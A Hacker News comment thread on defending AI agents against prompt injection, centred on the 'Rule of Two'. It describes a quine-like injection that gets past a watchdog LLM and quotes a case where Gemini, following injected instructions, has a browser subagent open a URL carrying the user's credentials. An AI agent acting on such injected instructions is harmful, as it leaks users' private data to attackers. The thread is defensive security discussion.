top | item 46049625

(no title)

wingmanjd | 3 months ago

I really liked Simon's Willison's [1] and Meta's [2] approach using the "Rule of Two". You can have no more than 2 of the following:

- A) Process untrustworthy input - B) Have access to private data - C) Be able to change external state or communicate externally.

It's not bullet-proof, but it has helped communicate to my management that these tools have inherent risk when they hit all three categories above (and any combo of them, imho).

[EDIT] added "or communicate externally" to option C.

[1] https://simonwillison.net/2025/Nov/2/new-prompt-injection-pa... [2] https://ai.meta.com/blog/practical-ai-agent-security/

discuss

order

btown|3 months ago

It's really vital to also point out that (C) doesn't just mean agentically communicate externally - it extends to any situation where any of your users can even access the output of a chat or other generated text.

You might say "well, I'm running the output through a watchdog LLM before displaying to the user, and that watchdog doesn't have private data access and checks for anything nefarious."

But the problem is that the moment someone figures out how to prompt-inject a quine-like thing into a private-data-accessing system, such that it outputs another prompt injection, now you've got both (A) and (B) in your system as a whole.

Depending on your problem domain, you can mitigate this: if you're doing a classification problem and validate your outputs that way, there's not much opportunity for exfiltration (though perhaps some might see that as a challenge). But plaintext outputs are difficult to guard against.

quuxplusone|3 months ago

Can you elaborate? How does an attacker turn "any of your users can even access the output of a chat or other generated text" into a means of exfiltrating data to the attacker?

Are you just worried about social engineering — that is, if the attacker can make the LLM say "to complete registration, please paste the following hex code into evil.example.com:", then a large number of human users will just do that? I mean, you'd probably be right, but if that's "all" you mean, it'd be helpful to say so explicitly.

blcknight|3 months ago

It baffles me that we've spent decades building great abstractions to isolate processes with containers and VM's, and we've mostly thrown it out the window with all these AI tools like Cursor, Antigravity, and Claude Code -- at least in their default configurations.

otabdeveloper4|3 months ago

Exfiltrating other people's code is the entire reason why "agentic AI" even exists as a business.

It's this decade's version of "they trust me, dumb fucks".

ArcHound|3 months ago

I recall that. In this case, you have only A and B and yet, all of your secrets are in the hands of an attacker.

It's great start, but not nearly enough.

EDIT: right, when we bundle state with external Comms, we have all three indeed. I missed that too.

malisper|3 months ago

Not exactly. Step E in the blog post:

> Gemini exfiltrates the data via the browser subagent: Gemini invokes a browser subagent per the prompt injection, instructing the subagent to open the dangerous URL that contains the user's credentials.

fulfills the requirements for being able to change external state

bartek_gdn|3 months ago

What do you mean? The last part in this case is also present, you can change external state by sending a request with the captured content.

helsinki|3 months ago

Yeah, makes perfect sense, but you really lose a lot.

blazespin|3 months ago

You can't process untrustworthy data, period. There are so many things that can go wrong with that.

yakbarber|3 months ago

that's basically saying "you can't process user input". sure you can take that line, but users wont find your product to be very useful

j16sdiz|3 months ago

Something need to process the untrustworthy data before it can become trustworthy =/

VMG|3 months ago

your browser is processing my comment